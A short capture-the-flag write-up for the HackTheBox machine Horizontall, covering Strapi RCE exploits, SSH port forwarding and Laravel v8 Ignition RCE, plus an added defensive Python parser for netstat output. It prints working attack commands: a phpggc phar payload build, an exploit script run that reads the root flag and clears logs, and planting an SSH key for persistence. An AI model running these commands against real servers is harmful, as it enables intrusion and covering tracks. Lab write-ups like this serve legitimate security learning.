Horizontall
Date: August 31, 2021
Level: Easy
Summary: 1. Subdomain found in a JS file
2. JWT leads to RCE in Strapi
3. SSH port forwarding
4. Laravel v8 RCE
Tags: Laravel, port forwarding
Port scan
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
A subdomain was found in a JS file.
Exploits used
https://www.exploit-db.com/exploits/50239
https://www.exploit-db.com/exploits/50237
strapi
$ netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1789/node /usr/bin/
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
Ports 8000 and 1337 are also open locally (bound to 127.0.0.1 only, so not reachable from the network directly).
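As an added example (not part of the original writeup), the following Python parses `netstat -antlp` output like the table above and separates loopback-only listeners from network-exposed ones, which is the check a host owner would run when auditing what an SSH-capable user could reach by forwarding ports. `NETSTAT_OUTPUT` is the table reproduced from above as sample input; the function and class names are my own.

```python
"""Classify listening sockets from `netstat -antlp` output by bind scope."""
from dataclasses import dataclass
from typing import List

# Sample input: the netstat table shown above, reproduced as a constant.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1789/node /usr/bin/
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
"""


@dataclass
class Listener:
    proto: str
    addr: str
    port: int
    program: str
    loopback: bool


def parse_listeners(text: str) -> List[Listener]:
    """Return one Listener per LISTEN line; headers and non-listening sockets are skipped."""
    result = []
    for line in text.splitlines():
        # Split into at most 7 fields: the program name may itself contain spaces.
        fields = line.split(None, 6)
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        if fields[5] != "LISTEN":
            continue
        # rpartition handles both "0.0.0.0:80" and IPv6 forms such as ":::80".
        addr, _, port = fields[3].rpartition(":")
        program = fields[6].strip() if len(fields) > 6 else "-"
        loopback = addr.startswith("127.") or addr == "::1"
        result.append(Listener(fields[0], addr, int(port), program, loopback))
    return result


def loopback_only_ports(text: str) -> List[int]:
    """Ports bound only to loopback: invisible to a port scan, reachable via SSH -L."""
    return sorted(l.port for l in parse_listeners(text) if l.loopback)


def exposed_ports(text: str) -> List[int]:
    """Ports bound to a non-loopback address, i.e. reachable from the network."""
    return sorted(l.port for l in parse_listeners(text) if not l.loopback)


if __name__ == "__main__":
    print("exposed:", exposed_ports(NETSTAT_OUTPUT))
    print("loopback-only:", loopback_only_ports(NETSTAT_OUTPUT))
```

On the output above this reports 22 and 80 as exposed and 1337 and 8000 as loopback-only, matching what the port scan did and did not show.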
curl 127.0.0.1:8000
It is running Laravel v8.
Use SSH to forward the port out.
Create .ssh in the user's home directory, generate a key pair on Kali, and upload the public key to the host as authorized_keys:
➜ .ssh cat id_rsa.pub > authorized_keys
Port forwarding:
ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb
Root
➜ phpggc git:(master) php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt"
➜ phpggc git:(master) python3 ../laravel-exploits/laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d81660812e51818997acccae1f11ef9b
--------------------------
+ Logs cleared
References
Strapi CVE-2019-18818 password reset vulnerability